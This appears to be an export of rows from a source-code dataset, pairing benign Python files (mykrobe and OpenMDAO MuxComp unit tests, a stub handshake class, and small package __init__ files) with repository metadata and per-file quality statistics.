self.assertEqual('S', suscept_data[drug]['predict'])
else:
self.assertEqual('N', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_run_predict_and_check_susceptibility_fake_run_resistant(self):
'''test run_predict and susceptibility_dict_from_json_file in unittest mode with resistant call'''
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
mykrobe.run_predict([reads_file], tmp_out, 'sample_name', 'tb', unittest=True, unittest_resistant=True)
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
if drug == 'Isoniazid':
self.assertEqual('R', suscept_data[drug]['predict'])
else:
self.assertEqual('S', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_run_predict_and_check_susceptibility_fake_run_susceptible(self):
'''test run_predict and susceptibility_dict_from_json_file in unittest mode with no resistant calls'''
reads_file = os.path.join(data_dir, 'run_predict.reads.fq.gz')
tmp_out = 'tmp.mykrobe_run_predict'
mykrobe.run_predict([reads_file], tmp_out, 'sample_name', 'tb', unittest=True, unittest_resistant=False)
json_file = os.path.join(tmp_out, 'out.json')
suscept_data = mykrobe.susceptibility_dict_from_json_file(json_file)
for drug in suscept_data:
self.assertEqual('S', suscept_data[drug]['predict'])
shutil.rmtree(tmp_out)
def test_panel_not_built_in(self):
'''test Panel not built-in'''
species = 'tb'
name = 'panel_name'
panel_dir = 'tmp.mykrobe.panel'
custom_probe = os.path.join(data_dir, 'run_predict.probes.fa')
custom_json = os.path.join(data_dir, 'run_predict.json')
panel = mykrobe.Panel(panel_dir)
panel.setup_files(species, name, custom_probe, custom_json)
self.assertTrue(os.path.exists(panel.probes_fasta))
self.assertTrue(os.path.exists(panel.var_to_res_json))
self.assertEqual(species, panel.metadata['species'])
self.assertEqual(name, panel.metadata['name'])
self.assertFalse(panel.metadata['is_built_in'])
shutil.rmtree(panel_dir)
def test_panel_built_in(self):
'''test Panel built-in'''
species = 'tb'
name = 'walker-2015'
panel_dir = 'tmp.mykrobe.panel'
panel = mykrobe.Panel(panel_dir)
panel.setup_files(species, name, None, None)
self.assertEqual(species, panel.metadata['species'])
self.assertEqual(name, panel.metadata['name'])
self.assertTrue(panel.metadata['is_built_in'])
shutil.rmtree(panel_dir)
| 46.693069
| 134
| 0.677481
| 628
| 4,716
| 4.786624
| 0.154459
| 0.07984
| 0.043247
| 0.045243
| 0.825017
| 0.770792
| 0.750166
| 0.709248
| 0.709248
| 0.681304
| 0
| 0.001876
| 0.208651
| 4,716
| 100
| 135
| 47.16
| 0.803591
| 0.103902
| 0
| 0.653846
| 0
| 0
| 0.13001
| 0.053912
| 0
| 0
| 0
| 0
| 0.192308
| 1
| 0.076923
| false
| 0
| 0.051282
| 0
| 0.141026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48050dae99fe7bd295da8ffa2e3e1b4c7977d671
| 9,512
|
py
|
Python
|
openmdao/components/tests/test_mux_comp.py
|
fzahle/OpenMDAO
|
ce53b0a0862ac1162d5daad7b0ca34ae085ee47c
|
[
"Apache-2.0"
] | 1
|
2016-05-10T17:01:17.000Z
|
2016-05-10T17:01:17.000Z
|
openmdao/components/tests/test_mux_comp.py
|
gsoxley/OpenMDAO
|
709401e535cf6933215abd942d4b4d49dbf61b2b
|
[
"Apache-2.0"
] | 3
|
2016-05-10T16:55:46.000Z
|
2018-10-22T23:28:52.000Z
|
openmdao/components/tests/test_mux_comp.py
|
gsoxley/OpenMDAO
|
709401e535cf6933215abd942d4b4d49dbf61b2b
|
[
"Apache-2.0"
] | 2
|
2018-04-05T15:53:54.000Z
|
2018-10-22T22:48:00.000Z
|
from __future__ import print_function, division, absolute_import
import unittest
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp
from openmdao.utils.assert_utils import assert_rel_error, assert_check_partials
from openmdao.api import MuxComp
class TestMuxCompOptions(unittest.TestCase):
    """Verify that MuxComp rejects axis values larger than the muxed rank allows."""

    def test_invalid_axis_scalar(self):
        num_inputs = 10
        prob = Problem(model=Group())

        indeps = IndepVarComp()
        for idx in range(num_inputs):
            indeps.add_output(name='a_{0}'.format(idx), val=1.0)
        prob.model.add_subsystem(name='ivc', subsys=indeps, promotes_outputs=['*'])

        mux = prob.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=num_inputs))
        # Scalar inputs can only be stacked along axis 0 or 1; axis 2 must fail.
        mux.add_var('a', shape=(1,), axis=2)

        for idx in range(num_inputs):
            prob.model.connect('a_{0}'.format(idx), 'mux_comp.a_{0}'.format(idx))

        with self.assertRaises(ValueError) as ctx:
            prob.setup()
        self.assertEqual(str(ctx.exception),
                         'Cannot mux a 1D inputs for a along axis greater than 1 (2)')

    def test_invalid_axis_1D(self):
        num_inputs = 10
        len_a = 7
        len_b = 3
        prob = Problem(model=Group())

        indeps = IndepVarComp()
        for idx in range(num_inputs):
            indeps.add_output(name='a_{0}'.format(idx), shape=(len_a,))
            indeps.add_output(name='b_{0}'.format(idx), shape=(len_b,))
        prob.model.add_subsystem(name='ivc', subsys=indeps, promotes_outputs=['*'])

        mux = prob.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=num_inputs))
        mux.add_var('a', shape=(len_a,), axis=0)
        # 1D inputs stack into a 2D result, so axis 2 is out of range for 'b'.
        mux.add_var('b', shape=(len_b,), axis=2)

        for idx in range(num_inputs):
            prob.model.connect('a_{0}'.format(idx), 'mux_comp.a_{0}'.format(idx))
            prob.model.connect('b_{0}'.format(idx), 'mux_comp.b_{0}'.format(idx))

        with self.assertRaises(ValueError) as ctx:
            prob.setup()
        self.assertEqual(str(ctx.exception),
                         'Cannot mux a 1D inputs for b along axis greater than 1 (2)')
class TestMuxCompScalar(unittest.TestCase):
    """Mux scalar inputs: 'a' stacked along axis 0, 'b' along axis 1."""

    def setUp(self):
        self.nn = 10
        self.p = Problem(model=Group())

        indeps = IndepVarComp()
        for idx in range(self.nn):
            indeps.add_output(name='a_{0}'.format(idx), val=1.0)
            indeps.add_output(name='b_{0}'.format(idx), val=1.0)
        self.p.model.add_subsystem(name='ivc', subsys=indeps, promotes_outputs=['*'])

        mux = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
        mux.add_var('a', shape=(1,), axis=0)
        mux.add_var('b', shape=(1,), axis=1)

        for idx in range(self.nn):
            self.p.model.connect('a_{0}'.format(idx), 'mux_comp.a_{0}'.format(idx))
            self.p.model.connect('b_{0}'.format(idx), 'mux_comp.b_{0}'.format(idx))

        # Complex allocation is required by the complex-step partials check below.
        self.p.setup(force_alloc_complex=True)

        for idx in range(self.nn):
            self.p['a_{0}'.format(idx)] = np.random.rand(1)
            self.p['b_{0}'.format(idx)] = np.random.rand(1)

        self.p.run_model()

    def test_results(self):
        # Each scalar input must reappear unchanged at its slot in the muxed output.
        for idx in range(self.nn):
            assert_rel_error(self, self.p['a_{0}'.format(idx)], self.p['mux_comp.a'][idx])
            assert_rel_error(self, self.p['b_{0}'.format(idx)], self.p['mux_comp.b'][0, idx])

    def test_partials(self):
        np.set_printoptions(linewidth=1024)
        cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
        assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestMuxComp1D(unittest.TestCase):
    """Mux 1D inputs of different sizes: 'a' along axis 0, 'b' along axis 1."""

    def setUp(self):
        self.nn = 10
        a_size = 7
        b_size = 3
        self.p = Problem(model=Group())

        ivc = IndepVarComp()
        for i in range(self.nn):
            ivc.add_output(name='a_{0}'.format(i), shape=(a_size,))
            ivc.add_output(name='b_{0}'.format(i), shape=(b_size,))
        self.p.model.add_subsystem(name='ivc',
                                   subsys=ivc,
                                   promotes_outputs=['*'])

        mux_comp = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
        mux_comp.add_var('a', shape=(a_size,), axis=0)
        mux_comp.add_var('b', shape=(b_size,), axis=1)

        for i in range(self.nn):
            self.p.model.connect('a_{0}'.format(i), 'mux_comp.a_{0}'.format(i))
            self.p.model.connect('b_{0}'.format(i), 'mux_comp.b_{0}'.format(i))

        # Complex allocation is required by the complex-step partials check below.
        self.p.setup(force_alloc_complex=True)

        for i in range(self.nn):
            self.p['a_{0}'.format(i)] = np.random.rand(a_size)
            self.p['b_{0}'.format(i)] = np.random.rand(b_size)

        self.p.run_model()

    def test_results(self):
        # Fix: a stray dead 'pass' statement that preceded these assertions
        # has been removed (leftover debris; the loop below still ran).
        for i in range(self.nn):
            out_i = self.p['mux_comp.a'][i, ...]
            in_i = self.p['a_{0}'.format(i)]
            assert_rel_error(self, in_i, out_i)

            out_i = self.p['mux_comp.b'][:, i]
            in_i = self.p['b_{0}'.format(i)]
            assert_rel_error(self, in_i, out_i)

    def test_partials(self):
        np.set_printoptions(linewidth=1024)
        cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
        assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestMuxComp2D(unittest.TestCase):
    """Mux 2D inputs along each of the three possible result axes."""

    def setUp(self):
        self.nn = 10
        shape_a = (3, 3)
        shape_bc = (2, 4)  # shared by variables 'b' and 'c'
        self.p = Problem(model=Group())

        indeps = IndepVarComp()
        for idx in range(self.nn):
            indeps.add_output(name='a_{0}'.format(idx), shape=shape_a)
            indeps.add_output(name='b_{0}'.format(idx), shape=shape_bc)
            indeps.add_output(name='c_{0}'.format(idx), shape=shape_bc)
        self.p.model.add_subsystem(name='ivc', subsys=indeps, promotes_outputs=['*'])

        mux = self.p.model.add_subsystem(name='mux_comp', subsys=MuxComp(vec_size=self.nn))
        mux.add_var('a', shape=shape_a, axis=0)
        mux.add_var('b', shape=shape_bc, axis=1)
        mux.add_var('c', shape=shape_bc, axis=2)

        for idx in range(self.nn):
            self.p.model.connect('a_{0}'.format(idx), 'mux_comp.a_{0}'.format(idx))
            self.p.model.connect('b_{0}'.format(idx), 'mux_comp.b_{0}'.format(idx))
            self.p.model.connect('c_{0}'.format(idx), 'mux_comp.c_{0}'.format(idx))

        # Complex allocation is required by the complex-step partials check below.
        self.p.setup(force_alloc_complex=True)

        for idx in range(self.nn):
            self.p['a_{0}'.format(idx)] = np.random.rand(*shape_a)
            self.p['b_{0}'.format(idx)] = np.random.rand(*shape_bc)
            self.p['c_{0}'.format(idx)] = np.random.rand(*shape_bc)

        self.p.run_model()

    def test_results(self):
        # Each input must appear intact at index idx along its variable's mux axis.
        for idx in range(self.nn):
            assert_rel_error(self, self.p['a_{0}'.format(idx)], self.p['mux_comp.a'][idx, ...])
            assert_rel_error(self, self.p['b_{0}'.format(idx)], self.p['mux_comp.b'][:, idx, :])
            assert_rel_error(self, self.p['c_{0}'.format(idx)], self.p['mux_comp.c'][:, :, idx])

    def test_partials(self):
        np.set_printoptions(linewidth=1024)
        cpd = self.p.check_partials(compact_print=False, method='cs', out_stream=None)
        assert_check_partials(cpd, atol=1.0E-8, rtol=1.0E-8)
class TestForDocs(unittest.TestCase):

    def test(self):
        """
        An example demonstrating a trivial use case of MuxComp
        """
        import numpy as np
        from openmdao.api import Problem, Group, IndepVarComp, MuxComp, VectorMagnitudeComp
        from openmdao.utils.assert_utils import assert_rel_error

        # The number of elements to be muxed
        n = 3

        # The size of each element to be muxed
        m = 100

        p = Problem(model=Group())

        ivc = IndepVarComp()
        for axis_name in ('x', 'y', 'z'):
            ivc.add_output(name=axis_name, shape=(m,), units='m')

        p.model.add_subsystem(name='ivc',
                              subsys=ivc,
                              promotes_outputs=['x', 'y', 'z'])

        mux_comp = p.model.add_subsystem(name='mux', subsys=MuxComp(vec_size=n))
        mux_comp.add_var('r', shape=(m,), axis=1, units='m')

        p.model.add_subsystem(name='vec_mag_comp',
                              subsys=VectorMagnitudeComp(vec_size=m, length=n, in_name='r',
                                                         mag_name='r_mag', units='m'))

        for idx, axis_name in enumerate(('x', 'y', 'z')):
            p.model.connect(axis_name, 'mux.r_{0}'.format(idx))
        p.model.connect('mux.r', 'vec_mag_comp.r')

        p.setup()

        for axis_name in ('x', 'y', 'z'):
            p[axis_name] = 1 + np.random.rand(m)

        p.run_model()

        # Verify the results against numpy.dot in a for loop.
        for i in range(n):
            r_i = [p['x'][i], p['y'][i], p['z'][i]]
            expected_i = np.sqrt(np.dot(r_i, r_i))
            assert_rel_error(self, p.get_val('vec_mag_comp.r_mag')[i], expected_i)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
| 32.8
| 96
| 0.554563
| 1,413
| 9,512
| 3.532909
| 0.101911
| 0.047075
| 0.070513
| 0.037861
| 0.820713
| 0.808894
| 0.776242
| 0.767027
| 0.726963
| 0.67488
| 0
| 0.0197
| 0.284903
| 9,512
| 289
| 97
| 32.913495
| 0.714202
| 0.018818
| 0
| 0.621762
| 0
| 0
| 0.073386
| 0
| 0
| 0
| 0
| 0
| 0.088083
| 1
| 0.062176
| false
| 0.005181
| 0.046632
| 0
| 0.134715
| 0.036269
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48331baee3e3cae0ace1e5e1f868a7d1ce0dc02d
| 151
|
py
|
Python
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | 2
|
2015-10-18T07:40:46.000Z
|
2015-10-25T16:03:18.000Z
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | 1
|
2015-10-18T11:38:04.000Z
|
2015-10-18T11:38:04.000Z
|
handshake.py
|
Myselfminer/N
|
072a589301d8d8e4395e75c9ea720d6074eff6b6
|
[
"Apache-2.0"
] | null | null | null |
class handshake:
    # NOTE(review): lowercase class name; renaming to PascalCase would break
    # existing callers, so it is left as-is.

    def clientside(Socket_Object):
        """This must be called with the main object from the socket"""
        # Stub: no handshake logic is implemented yet; the trailing commented
        # fragment suggests methods of Socket_Object were to be called here.
        # NOTE(review): the first parameter is the socket object, not 'self' —
        # presumably intended to be invoked as handshake.clientside(sock);
        # confirm with the caller before converting to an instance method.
        pass#Socket_Object.
| 30.2
| 70
| 0.682119
| 20
| 151
| 5.05
| 0.75
| 0.237624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238411
| 151
| 4
| 71
| 37.75
| 0.878261
| 0.470199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
6faf4a276c74ce99f0dae17a23fa22175362c533
| 107
|
py
|
Python
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | 12
|
2021-07-05T12:33:20.000Z
|
2021-10-11T20:44:12.000Z
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | 7
|
2021-07-28T20:40:36.000Z
|
2021-10-12T12:31:51.000Z
|
geesedb/connection/__init__.py
|
informagi/GeeseDB
|
b502830cafbcba8676e7e779d13d5bc14ba842f9
|
[
"MIT"
] | null | null | null |
# Re-export the connection helpers at package level so callers can do
# `from geesedb.connection import get_connection`.
from .connection import get_connection, close_connection

# Explicit public API of this package.
__all__ = ['get_connection', 'close_connection']
| 26.75
| 56
| 0.813084
| 12
| 107
| 6.583333
| 0.5
| 0.329114
| 0.455696
| 0.708861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093458
| 107
| 3
| 57
| 35.666667
| 0.814433
| 0
| 0
| 0
| 0
| 0
| 0.280374
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6fb02fdd66b03f6fe4bef83d6e39926b3126806d
| 160
|
py
|
Python
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 282
|
2020-05-09T21:35:22.000Z
|
2022-03-20T11:29:41.000Z
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 180
|
2020-05-03T09:31:48.000Z
|
2022-03-30T12:12:48.000Z
|
continuum/rehearsal/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 34
|
2020-06-13T14:09:29.000Z
|
2022-03-14T14:05:07.000Z
|
# Package-level re-exports: herding (exemplar-selection) strategies and the
# rehearsal memory container.
from continuum.rehearsal.herding import herd_random, herd_closest_to_cluster, herd_closest_to_barycenter
from continuum.rehearsal.memory import RehearsalMemory
| 53.333333
| 104
| 0.9
| 21
| 160
| 6.52381
| 0.619048
| 0.189781
| 0.321168
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 160
| 2
| 105
| 80
| 0.913333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.